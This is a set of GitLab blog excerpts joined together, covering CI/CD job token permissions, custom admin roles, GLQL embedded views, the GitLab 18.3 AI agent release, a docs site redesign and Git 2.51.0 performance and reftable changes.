This capability allows maintainers to implement granular permissions that control job token access to API resources. Following the principle of least privilege, these job tokens have no ability to access any API resources until you explicitly grant them permissions.

This initial release includes fine-grained permissions for the following resources:

• Repositories
• Deployments
• Environments
• Jobs
• Packages
• Pipelines
• Releases
• Secure Files
• Terraform State

Additional API endpoints are planned for future releases. For more information, see the associated epic.

The bigger picture

This release represents a critical step in GitLab's broader mission to improve your software supply chain security. Historically, job tokens have been bound to the user running the pipeline, inheriting their privileges and creating security risks if pipelines are compromised.

Fine-grained permissions for job tokens provide a foundation for a more secure CI/CD ecosystem that:

• Reduces attack surface: Implements the principle of least privilege by limiting access to only necessary resources
• Eliminates dependency on long-lived tokens: Provides a secure alternative that reduces the need for personal access tokens and other persistent credentials
• Prepares for machine-based identity: This opt-in approach lays the groundwork for eventually decoupling job tokens from user identities entirely, moving toward true machine-to-machine authentication
• Enables secure automation at scale: Supports complex deployment workflows and CI/CD components without compromising security

Getting started

Security teams and DevOps engineers should evaluate this feature for any projects running automated deployments, package publishing, or infrastructure management. Since this is an opt-in capability, you can migrate gradually to minimize disruption to your existing pipelines.

Start by identifying your most critical pipelines and auditing their current permission requirements. Then enable fine-grained permissions and configure the minimal access needed for each project. For more information, see the documentation on fine-grained permissions for CI/CD job tokens.

These granular admin permissions allow organizations to create purpose-built administrative roles instead of granting complete administrator access to users. Potential use cases include:

• Platform Team: Access to runner management, instance monitoring, and performance metrics
• Support Team: Access to user management and troubleshooting workflows
• Leadership Team: Access to dashboards, usage statistics, and licensing

Features

• Granular permissions: Custom permissions let you build a role that fits your needs.
• Instance-level management: Custom admin roles are created and managed centrally.
• LDAP integration: Support for mapping large user sets to roles through directory servers.
• Audit integration: Works with existing Admin mode and audit events.

Mission: Improve software supply chain security

This feature represents a critical step in GitLab's broader mission to improve your software supply chain security. As part of this mission, GitLab has also added custom roles for projects and groups and granular permissions for CI/CD job tokens.

For more information on custom admin roles, see custom roles. Additional permissions are planned for future releases. To share feedback, see the custom roles issue.

If that sounds familiar, you’re definitely not alone. So many teams waste time and energy flipping through various items in their project management software, just trying to get a handle on their work.

That's why we created embedded views, powered by GitLab Query Language (GLQL). With embedded views, available in 18.3, you get live, relevant information right where you’re already working in GitLab. No more endless context switching. No more outdated reports. Just the info you need, right when you need it.

Why embedded views matter

Embedded views are more than just a new feature, they're a fundamental shift in how teams understand and track their work within GitLab. With embedded views, teams can maintain context while accessing real-time information, creating shared understanding, and improving collaboration without ever leaving their current workflow. It’s about making work tracking feel natural and effortless, so you can focus on what matters.

How it works: Real-time data right where you need it the most

Embedded views let you insert live GLQL queries in Markdown code blocks throughout wiki pages, epics, issues, and merge requests. Here's what makes them so useful:

Always up to date

GLQL queries are dynamic, pulling fresh data each time the page loads, so your embedded views always reflect the current state of your work, not the state when you embedded the view. When changes happen to issues, merge requests, or milestones, a page refresh will show those updates in your embedded view.

Contextual awareness

Use functions like currentUser() and today() to make queries context-specific. Your embedded views automatically adapt to show relevant information for whoever is viewing them, creating personalized experiences without manual configuration.

Powerful filtering

Filter by fields like assignee, author, label, milestone, health status, creation date, and more. Use logical expressions to get exactly the data you want. We support more than 30 fields as of 18.3.

Customizable display

You can display your data as a table, a list, or a numbered list. Choose which fields to show, set a limit on the number of items, and specify the sort order to keep your view focused and actionable.

Availability

You can use embedded views in group and project wikis, epic and issue descriptions, merge requests, and comments. GLQL is available across all GitLab tiers: Free, Premium, and Ultimate, on GitLab.com, GitLab Self-Managed, and GitLab Dedicated. Certain functionality, such as displaying epics, status, custom fields, iterations, and weights, is available in the Premium and Ultimate tiers. Displaying health status is available only in Ultimate.

See embedded views in action

The syntax of an embedded view's source is a superset of YAML that consists of:

• The query parameter: Expressions joined together with a logical operator, such as and.
• Parameters related to the presentation layer, like display, limit, or fields, title, and description represented as YAML.

A view is defined in Markdown as a code block, similar to other code blocks like Mermaid.

For example:

Display a table of first 5 open issues assigned to the authenticated user in gitlab-org/gitlab. Display columns title, state, health, description, epic, milestone, weight, and updated.

```glql
display: table
title: GLQL table 🎉
description: This view lists my open issues
fields: title, state, health, epic, milestone, weight, updated
limit: 5
query: project = "gitlab-org/gitlab" AND assignee = currentUser() AND state = opened
```

This source should render a table like the one below:

An easy way to create your first embedded view is to navigate to the More options dropdown in the rich text editor toolbar. Once in this toolbar, select Embedded view, which populates the following query in a Markdown code block:

```glql
query: assignee = currentUser()
fields: title, createdAt, milestone, assignee
title: Issues assigned to current user
```

Save your changes to the comment or description where the code block appears, and you're done! You've successfully created your first embedded view!

How GitLab uses embedded views

Whether tracking merge requests targeting security releases, triaging bugs to improve backlog hygiene, or managing team onboarding and milestone planning, we rely on embedded views for mission-critical processes every day. This isn't just a feature we built, it's a tool we depend on to run our business effectively. When you adopt embedded views, you're getting a tested solution that's already helping GitLab teams work more efficiently, make data-driven decisions, and maintain visibility across complex workflows. Simply stated, embedded views can transform how your team accesses and analyzes the work that matters most to your success.

To learn and see more about how GitLab is using embedded views internally, check out How GitLab measures Red Team impact: The adoption rate metric, and Global Search Release Planning issues for the 18.1, 18.2, and 18.3 milestones.

What's next

Embedded views are just the start of Knowledge Group's vision for work tracking. Learn more about what we're focusing on next in the embedded views post-GA epic. As embedded views evolve we're committed to making them even more powerful and accessible.

Share your experience

Share your feedback in the embedded views GA feedback issue. Whether you've discovered innovative use cases, encountered challenges, or have ideas for improvements, we want to hear from you.

This transformation is happening at three distinct layers that go beyond what other AI dev tools are doing:

First, we are a system of record. Our unified data platform holds your most valuable digital assets. This includes your source code and intellectual property, as well as a wealth of unstructured data spanning project plans, bug backlogs, CI/CD configurations, deployment histories, security reports, and compliance data. This creates a treasure trove of contextual data that remains securely within your GitLab environment, unavailable to generic agents or large language models.

Second, we act as your software control plane. We orchestrate your most critical business processes through Git repositories, REST APIs, and webhook-based interfaces that power your end-to-end software delivery. Many of our customers consider this a tier-0 dependency that their critical business processes rely on daily.

Third, we deliver a powerful user experience. We deliver an integrated interface that helps eliminate the costly context-switching that slows down most engineering teams. With complete lifecycle visibility and collaboration tools in one platform, over 50 million registered users and our vast community depend on GitLab to get their work done. This expertise positions GitLab uniquely to pioneer intuitive human-to-AI collaboration that amplifies team productivity while preserving the workflows that our users know and trust.

Extending our platform with AI natively integrated at every layer

GitLab Duo Agent Platform integrates and extends all three of these layers. It is designed for extensibility and interoperability, enabling customers and partners to build solutions that create even more value. Our open platform approach emphasizes seamless connectivity with external AI tools and systems while being deeply integrated into our existing stack at all three layers.

• First, we're extending our unified data platform with a Knowledge Graph, which indexes and stitches together code with all of the rest of your unstructured data, specifically optimized for agentic access. AI thrives on context, and we believe this will not only accelerate reasoning and inference by agents but also deliver lower-cost and higher-quality agentic outcomes.
• Second, we're adding an important Orchestration Layer to our existing Control Plane in three distinct parts: enabling agents and flows to register as subscribers for GitLab SDLC events, building a new orchestration engine that allows for purpose-built, multi-agent flows, and exposing GitLab tools, agents, and flows via MCP and standard protocols for unparalleled interoperability.
• Finally, we're extending the GitLab experience to deliver first-class agents and agent flows across the entire software development lifecycle. You'll be able to assign async tasks to agents, @ mention them in comments, and create custom agents with context specific to your workflows — but more importantly, GitLab is shipping native agents for every stage of development while unlocking a rich ecosystem of third-party agents. This creates true human-to-AI collaboration where agents become as natural to work with as your human teammates.

Watch this video to see what's coming in 18.3 and beyond, or read on.

<div style="padding:75% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111796316?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab_18.3 Release_081925_MP_v1"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

What's new in GitLab 18.3

With 18.2, we introduced specialized AI agents that work alongside developers across the software development lifecycle, plus our Software Development Flow — a powerful feature that gives users the ability to orchestrate multiple agents to plan, implement, and test code changes end-to-end.

GitLab 18.3 introduces expanded integrations and interoperability, more Flows, and enhanced context awareness across the entire software development lifecycle.

Expanded integrations and interoperability

We're delivering comprehensive AI extensibility through both first-party GitLab agents and a rich ecosystem of third-party agents, all with full access to project context and data. This approach maintains native GitLab workflows and governance while providing the flexibility to choose preferred tools through highly integrated orchestration between these agents and GitLab's core platform. Teams gain enhanced AI functionality while preserving key integration, oversight, and user experience benefits.

• MCP server - Universal AI integration: GitLab's MCP (Model Context Protocol) server enables AI systems to securely integrate directly with your GitLab projects and development processes. This standardized interface eliminates custom integration overhead and allows your AI tools — including Cursor — to work intelligently within your existing GitLab environment. See our docs for a full list of tools included with 18.3. This is only the start; additional tools are planned for 18.4.

“Bringing GitLab workflows directly into Cursor is a critical step in reducing friction for developers. By minimizing the need for context switching, teams can check issue status, review merge requests, and monitor pipeline results without ever leaving their coding environment. This integration is a natural fit for our shared customers, and we look forward to a long-term partnership with GitLab to continue enhancing developer productivity.”

- Ricky Doar, VP of Field Engineering at Cursor

“GitLab's MCP server and CLI agent support create powerful new ways for Amazon Q to integrate with development workflows. Amazon Q Developer can now connect directly through GitLab's remote MCP interface, while teams can delegate development tasks by simply @ mentioning Amazon Q CLI in issues and merge requests. The robust security and governance capabilities built into these integrations give enterprises the confidence to leverage AI coding tools while preserving their development standards. Our partnership with GitLab demonstrates AWS' ongoing commitment to expanding our AI ecosystem and making intelligent development tools accessible wherever developers work."

- Deepak Singh, Vice President of Developer Agents and Experiences at AWS

• CLI agent support for Claude Code, Codex, Amazon Q, Google Gemini, and opencode (Bring Your Own Key): 18.3 introduces integrations that enable teams to delegate routine development work by @ mentioning their agents directly in issues or merge requests. When developers mention these AI assistants, they automatically read the surrounding context and repository code, then respond to the user's comment with either ready-to-review code changes or inline comments. These integrations require you to bring your own API key for the respective AI providers and keep all interactions natively within GitLab's interface while maintaining proper permissions and audit trails.

  Note: Third-party agents is a GitLab Premium Beta feature and only available to GitLab Duo Enterprise customers for evaluation.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111784124?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Third Party Agents Flows Claude Code"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

“Bringing Claude Code directly into GitLab puts AI assistance where millions of developers already collaborate and ship code daily. The ability to mention Claude directly in issues and merge requests removes friction while maintaining quality with human oversight and review processes. This update brings Claude Code's capabilities to more places where teams work, making AI a natural part of their developer workflow.”

- Cat Wu, Claude Code Product Lead, Anthropic

“With GitLab's new agent integration in 18.3 you can use opencode within your existing workflows. You can @mention opencode in an issue or merge request and it'll run your agent right in your CI pipeline. This ability to configure and run opencode the way you want is the type of integration we know the open source community really values.”

- Jay V., CEO, opencode

• Agentic Chat support for Visual Studio IDE and GitLab UI available to all Premium and Ultimate customers: With 18.3, you no longer need to context-switch between tools to access GitLab's full development lifecycle data. Our enhanced integrations bring the complete power of GitLab Duo into the GitLab UI as well as IDEs — expanding support from JetBrains and VS Code to now include Visual Studio. This helps developers stay in flow while accessing rich project context, deployment history, and team collaboration data directly within their preferred environment.
• Expanded AI model support: GitLab Duo Self-Hosted now supports additional AI models, giving teams more flexibility in their AI-supported development workflows. You can now deploy open source OpenAI GPT models (20B and 120B parameters) through vLLM on your datacenter hardware, or through cloud services like Azure OpenAI and AWS Bedrock in your private cloud. Additionally, Anthropic's Claude 4 is available on AWS Bedrock

New automated development flows

GitLab Flows coordinate multiple AI agents with pre-built instructions to autonomously handle those time-consuming, mundane tasks so developers can focus on the work that matters most.

GitLab 18.3 comes with two new Flows:

• Issue to MR Flow enabling automated code generation from concept to completion in minutes: This Flow automatically converts issues into actionable merge requests (MRs) by coordinating agents to analyze requirements, prepare comprehensive implementation plans, and generate production-grade code that's ready for review — helping you turn ideas into reviewable implementations in minutes, not hours.

<div style="padding:75% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111782058?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Issue to MR"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

• Convert CI File Flow built for seamless migration intelligence: Our Convert CI File Flow streamlines migration workflows by having agents analyze existing CI/CD configurations and intelligently convert them to GitLab CI format with full pipeline compatibility. This helps eliminate the manual effort and potential errors of rewriting CI configurations from scratch, enabling teams to migrate entire deployment pipelines with confidence. 18.3 includes support for Jenkins migrations. Additional support is planned for future releases.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111783724?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Convert to CI Flow"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Intelligent code and search

AI point solutions typically operate with limited visibility into isolated code snippets, but GitLab's Knowledge Graph provides agents with environment context to help inform faster and more intelligent responses.

• Knowledge Graph for real-time code intelligence: With 18.3, GitLab's Knowledge Graph now delivers real-time code indexing to enable faster code searches, delivering more accurate and contextual results. By understanding the relationships between files, dependencies, and development patterns across your entire codebase, our agents are designed to provide insights that would take human developers hours to uncover — and this is just the first step in unlocking the powerful capabilities that are planned for Knowledge Graph.

Enterprise governance

AI transparency and organizational control are critical challenges that can hold teams back from fully adopting AI-powered development tools, with 85% of executives agreeing that agentic AI will create unprecedented security challenges.

These new features in 18.3 help address concerns around data governance, compliance requirements, and the need for visibility into AI decision-making processes so organizations can integrate AI within their existing security and policy frameworks.

• Agent Insights for transparency through intelligence: Our built-in agent tracking provides visibility into agent decision-making processes. Users can optimize workflows and follow best practices through transparent activity tracking.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111783244?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Agent Insights"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• GitLab Duo Code Review for Self-Hosted: This brings the intelligence of GitLab Duo to organizations with strict data governance requirements by allowing teams to keep sensitive code in controlled environments.
• Hybrid model configurations for flexible AI deployment: GitLab Duo Self-Hosted customers can now use hybrid model configurations, combining self-hosted AI models via their local AI gateway with GitLab's cloud models through GitLab's AI gateway, enabling access to various features.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1111783569?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Self Hosted Models Code Review"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p>

• Enhanced security with OAuth support: Our MCP server now includes full OAuth 2.0 authentication support, enabling secure connections to protected resources and sensitive development environments. This implementation follows the draft OAuth specification for MCP, handling authorization flows, token management, and dynamic client registration.

Secure by Design platform: Governance that scales

True platform security requires consistent application of governance principles across every layer of the development lifecycle. The same security fundamentals that make AI adoption safe — least-privilege access, centralized policy management, proactive monitoring, and granular permissions — must be embedded throughout the entire SDLC to create a cohesive, defense-in-depth approach.

GitLab 18.3 strengthens the foundational controls that help protect your entire software supply chain with these new updates:

• Custom admin role: Provides granular, purpose-built administrative permissions, replacing blanket admin access with precise, least-privilege controls. Instead of granting blanket administrative privileges that create security risks, organizations can now create specialized roles tailored to specific functions — platform teams managing runners and monitoring, support teams handling user management, and leadership accessing dashboards and usage statistics. With complete role lifecycle management through UI and API, audit logging, and auto-generated documentation, this feature enables true least-privilege administration while helping maintain operational efficiency and improve overall instance security.
• Instance-level compliance framework and security policy management: Organizations can now designate a dedicated compliance group that has the authority to apply standardized frameworks and security policies directly to top-level groups, automatically cascading enforcement to all their subgroups and projects. This centralized approach eliminates the compliance adoption blocker of fragmented policy management while maintaining group autonomy for additional local policies.
• Enhanced violations reporting: Teams now receive immediate notifications when unauthorized changes are made to MR approval rules, framework policies lack proper approvals, or time-based compliance controls are violated. By directly linking violations to specific compliance framework controls, teams get actionable insights that tell them exactly which requirement was breached, turning compliance from a reactive checkbox exercise into a proactive, integrated part of the development and security workflow.
• Fine-grained permissions for CI/CD job tokens: Replaces broad token access with granular, explicit permissions that grant CI/CD jobs access only to specific API endpoints they actually need. Instead of allowing jobs blanket access to project resources, teams can now define precise permissions for deployments, packages, releases, environments, and other critical resources, reducing the attack surface and potential for privilege escalation.
• AWS Secrets Manager integration: Teams using AWS Secrets Manager can now retrieve secrets directly in GitLab CI/CD jobs, simplifying the build and deploy processes. Secrets are accessed by a GitLab Runner using OpenID Connect protocol-based authentication, masked to prevent exposure in job logs, and destroyed after use. This approach eliminates the need to store secrets in variables and integrates cleanly into existing GitLab and AWS-based workflows. Developed in close collaboration with Deutsche Bahn and the AWS Secrets Manager team, this integration reflects our commitment to building solutions alongside customers to solve real-world challenges.

Artifact management: Securing your software supply chain

When artifacts aren't properly governed, small changes can have big consequences. Mutable packages, overwritten container images, and inconsistent rules across tools can trigger production outages, introduce vulnerabilities, and create compliance gaps. For enterprise DevSecOps, secure, centralized artifact management is essential for keeping the software supply chain intact.

Enterprise-grade artifact protection in 18.3

Building on our comprehensive package protection capabilities, GitLab 18.3 adds important new features:

• Conan revisions support: New in 18.3, Conan revisions provide package immutability for C++ developers. When changes are made to a package without changing its version, Conan calculates unique identifiers to track these changes, enabling teams to maintain immutable packages while preserving version clarity.
• Enhanced Container Registry security: Following the successful launch of immutable container tags in 18.2, we're seeing strong enterprise adoption. Once a tag is created that matches an immutable rule, no one — regardless of permission level — can modify that container image, preventing unintended changes to production dependencies.

These enhancements complement our existing protection capabilities for npm, PyPI, Maven, NuGet, Helm charts, and generic packages, enabling platform teams to implement consistent governance across their entire software supply chain — a requirement for organizations building secure internal developer platforms.

Unlike standalone artifact solutions, GitLab's integrated approach eliminates context switching between tools while providing end-to-end traceability from code to deployment, enabling platform teams to implement consistent governance across their entire software delivery pipeline.

Embedded views: Real-time visibility and reports

As GitLab projects grow in complexity, teams find themselves navigating between issues, merge requests, epics, and milestones to maintain visibility into work status. The challenge lies in consolidating this information efficiently while ensuring teams have real-time access to project progress without context switching or breaking their flow. Launching real-time work status visibility in 18.3 GitLab 18.3's embedded views, powered by our powerful GitLab Query Language (GLQL), eliminate context switching by bringing live project data directly into your workflow:

• Dynamic views: Insert live GLQL queries in Markdown code blocks throughout wiki pages, epics, issues, and merge requests that automatically refresh with current project states each time you load the page.
• Contextual personalization: Views automatically adapt using functions like currentUser() and today() to show relevant information for whoever is viewing, without manual configuration.
• Powerful filtering: Filter by 25+ fields, including assignee, author, label, milestone, health status, and creation date.
• Display flexibility: Present data as tables, lists, or numbered lists with customizable field selection, item limits, and sort orders to keep your views focused and actionable

Unlike fragmented project management approaches, we've designed embedded views to maintain your workflow continuity while providing real-time visibility, enabling teams to make informed decisions without losing focus or switching between multiple tools and interfaces.

Learn about the newest features in GitLab 18.3.

Get started today

GitLab 18.3 is available now for GitLab Premium and Ultimate users on GitLab.com and self-managed environments.

GitLab Dedicated customers are now upgraded to 18.2 and will be able to use the features released with GitLab 18.3 next month.

Ready to experience the future of software engineering? Enable beta and experimental features for GitLab Duo and start collaborating with AI agents that understand your complete development context.

New to GitLab? Start your free trial today and discover why the future of software engineering is human and AI collaboration, orchestrated through the world's most comprehensive DevSecOps platform.

<p><small><em>This blog post contains “forward-looking statements” within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in the forward-looking statements contained in this blog post are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to be materially different from any future results or outcomes expressed or implied by the forward-looking statements.</em></p> <p><em>Further information on risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this blog post are included under the caption “Risk Factors” and elsewhere in the filings and reports we make with the Securities and Exchange Commission. We do not undertake any obligation to update or release any revisions to any forward-looking statement or to report any events or circumstances after the date of this blog post or to reflect the occurrence of unanticipated events, except as required by law.</em></small></p>

Top five new features

Dark mode: The most requested feature is finally here. Toggle between light and dark themes in the upper-right corner for improved readability and reduced eye strain.

Brand alignment: Our docs now reflect the modern colors and design language of both the GitLab marketing site and product UI, creating a cohesive experience across all GitLab properties.

Simplified feedback: Users can now give thumbs up/down feedback and add comments directly on any documentation page.

Redesigned navigation: We've moved primary navigation to the top and restructured our left sidebar to make our 2,300+ pages feel less overwhelming and more discoverable.

Addressed technical debt: Dozens of small but impactful fixes to typography, spacing, code blocks, and visual inconsistencies that had accumulated over the years.

Why now? The foundation for change

Earlier this year, led by Sarah German, our documentation engineering team completed a critical replatforming project, migrating from Nanoc to Hugo. While largely invisible to users, this change delivered dramatic performance improvements — 130x faster local builds and 30x faster full builds — and provided the solid technical foundation needed for these improvements.

This replatforming was essential groundwork that enabled us to focus on user experience enhancements rather than wrestling with outdated infrastructure.

Let's look more closely at the changes.

Dark mode

Possibly the biggest news for this release: dark mode is now available across the entire documentation site. Change the setting in the upper-right corner, and the site will remember your preference. For many users, dark mode makes content easier to read and reduces eye strain.

Brand alignment with marketing site

The new design creates visual harmony between our documentation and the broader GitLab experience. We've incorporated GitLab's modern color palette and design elements while maintaining the clean, functional feel users expect from technical documentation.

The updated homepage focuses on our primary documentation areas, including tutorials and getting started guides that help new users learn GitLab.

Simplified feedback mechanism

We've eliminated friction in the feedback process. Instead of requiring users to leave the docs site and create GitLab issues, they can now provide immediate feedback with thumbs up/down ratings and comments directly on any page. Scroll down on any documentation page to see this new functionality in action.

Navigation redesign

One of our biggest challenges was organizing over 2,300 pages in a way that doesn't overwhelm users. Our previous single left navigation, while comprehensive, created a daunting experience:

The new approach moves primary navigation to the top, creating shorter, more manageable table of contents sections that feel less overwhelming to traverse:

This structure better reflects the relationships between features while making individual sections more digestible.

Style updates and technical debt

Over the years, small style inconsistencies had accumulated — inconsistent padding in lists, extra spacing around alerts, and various typography issues. While these might seem minor, they created a subtly jarring experience for daily users.

Our tabs and code blocks received particular attention, becoming better-defined in the process.

Before, tabs with code looked like this:

And now, with a few small tweaks, they look like this:

These "papercut" fixes may be small individually, but collectively they create a much more polished, professional experience.

What's next?

This redesign represents how we iterate at GitLab — shipping meaningful improvements while building toward an even better future. We expect to continue refining the structure and adding features that help users find what they need more easily.

User feedback will drive our next iterations, and with our new simplified feedback mechanism, we're better positioned than ever to hear directly from our documentation users.

The team

This transformation was a true team effort. Kudos to UX Papercuts and Julia Miocene for taking what started as a simple request and turning it into a comprehensive design vision. Thanks to the engineers in Technical Writing: Sarah German, Pearl Latteier, and Hiru Fernando, who brought these designs to life.

The new design balances information density with visual clarity, modernizes our site while maintaining usability and accessibility standards, and represents a significant step forward in both user experience and visual design.

Performance optimizations for git-push(1) and git-fetch(1)

The git-push(1) and git-fetch(1) commands allow users to synchronize local and remote repositories. Part of the operation involves updating references in the repository. In repositories with many references, this can take significant time, especially for users who work with large development environments, monorepos, or repositories with extensive CI/CD pipelines.

Git reference transactions can include multiple reference updates, but they follow an all-or-nothing approach. If any single update within the transaction fails, the entire transaction fails and none of the reference updates are applied. But reference updates as part of git-push(1) and git-fetch(1) are allowed to fail, which allows repositories to synchronize a subset of references even in the case where a different subset has diverged. To facilitate this behavior, Git creates a separate transaction for each reference update, allowing some transactions to fail while the rest succeed.

Creating a separate transaction per update incurs significant overhead, as each transaction includes an initiation and teardown phase and also checks for whether there are conflicting reference names. The “reftable” backend also performs auto-compaction at the end of a transaction, so multiple transactions would trigger multiple auto-compactions, which would drastically increase the latency of the command.

In Git 2.51.0, these commands now use batched updates instead of separate transactions. Batched updates allow updating multiple references under a single transaction, while still allowing some updates to fail. This removes the overhead and scales better with the number of references to be updated, since only a single transaction is used. This significantly improves the performance of the “reftable” backend, which now outperforms the “files” backend. Users can reap these performance improvements without needing to make any changes.

For git-fetch(1) we see a 22x performance improvement for the “reftable” backend and 1.25x improvement for the “files” backend when used in a repository with 10,000 references.

Benchmark 1: fetch: many refs (refformat = reftable, refcount = 10000, revision = master)
  Time (mean ± σ):      3.403 s ±  0.775 s    [User: 1.875 s, System: 1.417 s]
  Range (min … max):    2.454 s …  4.529 s    10 runs

Benchmark 2: fetch: many refs (refformat = reftable, refcount = 10000, revision = HEAD)
  Time (mean ± σ):     154.3 ms ±  17.6 ms    [User: 102.5 ms, System: 56.1 ms]
  Range (min … max):   145.2 ms … 220.5 ms    18 runs

Summary
  fetch: many refs (refformat = reftable, refcount = 10000, revision = HEAD) ran
   22.06 ± 5.62 times faster than fetch: many refs (refformat = reftable, refcount = 10000, revision = master)

Benchmark 1: fetch: many refs (refformat = files, refcount = 10000, revision = master)
  Time (mean ± σ):     605.5 ms ±   9.4 ms    [User: 117.8 ms, System: 483.3 ms]
  Range (min … max):   595.6 ms … 621.5 ms    10 runs

Benchmark 2: fetch: many refs (refformat = files, refcount = 10000, revision = HEAD)
  Time (mean ± σ):     485.8 ms ±   4.3 ms    [User: 91.1 ms, System: 396.7 ms]
  Range (min … max):   477.6 ms … 494.3 ms    10 runs

Summary
  fetch: many refs (refformat = files, refcount = 10000, revision = HEAD) ran
    1.25 ± 0.02 times faster than fetch: many refs (refformat = files, refcount = 10000, revision = master)

For git-push(1) we see a 18x performance improvement for the reftable backend and 1.21x improvement for the “files” backend when used in a repository with 10,000 references.

Benchmark 1: push: many refs (refformat = reftable, refcount = 10000, revision = master)
  Time (mean ± σ):      4.276 s ±  0.078 s    [User: 0.796 s, System: 3.318 s]
  Range (min … max):    4.185 s …  4.430 s    10 runs

Benchmark 2: push: many refs (refformat = reftable, refcount = 10000, revision = HEAD)
  Time (mean ± σ):     235.4 ms ±   6.9 ms    [User: 75.4 ms, System: 157.3 ms]
  Range (min … max):   228.5 ms … 254.2 ms    11 runs

Summary
  push: many refs (refformat = reftable, refcount = 10000, revision = HEAD) ran
   18.16 ± 0.63 times faster than push: many refs (refformat = reftable, refcount = 10000, revision = master)

Benchmark 1: push: many refs (refformat = files, refcount = 10000, revision = master)
  Time (mean ± σ):      1.121 s ±  0.021 s    [User: 0.128 s, System: 0.975 s]
  Range (min … max):    1.097 s …  1.156 s    10 runs

Benchmark 2: push: many refs (refformat = files, refcount = 10000, revision = HEAD)
  Time (mean ± σ):     927.9 ms ±  22.6 ms    [User: 99.0 ms, System: 815.2 ms]
  Range (min … max):   903.1 ms … 978.0 ms    10 runs

Summary
  push: many refs (refformat = files, refcount = 10000, revision = HEAD) ran
    1.21 ± 0.04 times faster than push: many refs (refformat = files, refcount = 10000, revision = master)

This project was led by Karthik Nayak.

Planning towards Git 3.0

11 years ago, Git 2.0 was released, which was the last major version release of Git. While we don’t have a specific timeline for the next major Git release, this release includes decisions made towards Git 3.0.

The Git 3.0 release planning allows us to plan for and implement breaking changes and communicate them to the extended Git community. Next to documentation, Git can also be compiled with these breaking changes for those who want to experiment with these changes. More information can be found in the BreakingChanges document.

The Git 2.51.0 release makes some significant changes towards Git 3.0.

Reftable as the default reference backend

In the Git 2.45.0 release, the “reftable” format was introduced as a new backend for storing references like branches or tags in Git, which fixes many of the issues with the existing "files" backend. Please read our beginner's guide to how reftables work for more insight into the “reftable” backend.

The Git 2.51.0 release marks the switch to using the "reftable" format as default in Git 3.0 for newly created repositories and also wires up the change behind a feature flag. The “reftable” format provides the following improvements over the traditional “files” backend:

• It is impossible to store two references that only differ in casing on case-insensitive filesystems with the "files" format. This issue is common on Windows and macOS platforms. As the "reftable" backend does not use filesystem paths to encode reference names this problem goes away.

• Similarly, macOS normalizes path names that contain unicode characters, which has the consequence that you cannot store two names with unicode characters that are encoded differently with the "files" backend. Again, this is not an issue with the "reftable" backend.

• Deleting references with the "files" backend requires Git to rewrite the complete "packed-refs" file. In large repositories with many references this file can easily be dozens of megabytes in size; in extreme cases it may be gigabytes. The "reftable" backend uses tombstone markers for deleted references and thus does not have to rewrite all of its data.

• Repository housekeeping with the "files" backend typically performs all-into-one repacks of references. This can be quite expensive, and consequently housekeeping is a tradeoff between the number of loose references that accumulate and slow down operations that read references, and compressing those loose references into the "packed-refs" file. The "reftable" backend uses geometric compaction after every write, which amortizes costs and ensures that the backend is always in a well-maintained state.

• Operations that write multiple references at once are not atomic with the "files" backend. Consequently, Git may see in-between states when it reads references while a reference transaction is in the process of being committed to disk.

• Writing many references at once is slow with the "files" backend because every reference is created as a separate file. The "reftable" backend significantly outperforms the "files" backend by multiple orders of magnitude.

• The “reftable” backend uses a binary format with prefix compression for reference names. As a result, the format uses less space compared to the "packed-refs" file.

This project was led by Patrick Steinhardt.

SHA-256 as the default hash function

The Git version control system stores objects in a content-addressable filesystem. This means it uses the hash of an object to address content such as files, directories, and revisions, unlike traditional filesystems, which use sequential numbers. Using a hash function has the following advantages:

• Easy integrity checks as a single bit flip would change the hash output completely.

• Fast object lookup as objects can be indexed by their hash.

• Object names can be signed and third parties can trust the hash to address the signed object and all objects it references.

• Communication using Git protocol and out of band communication methods have a short reliable string that can be used to reliably address stored content.

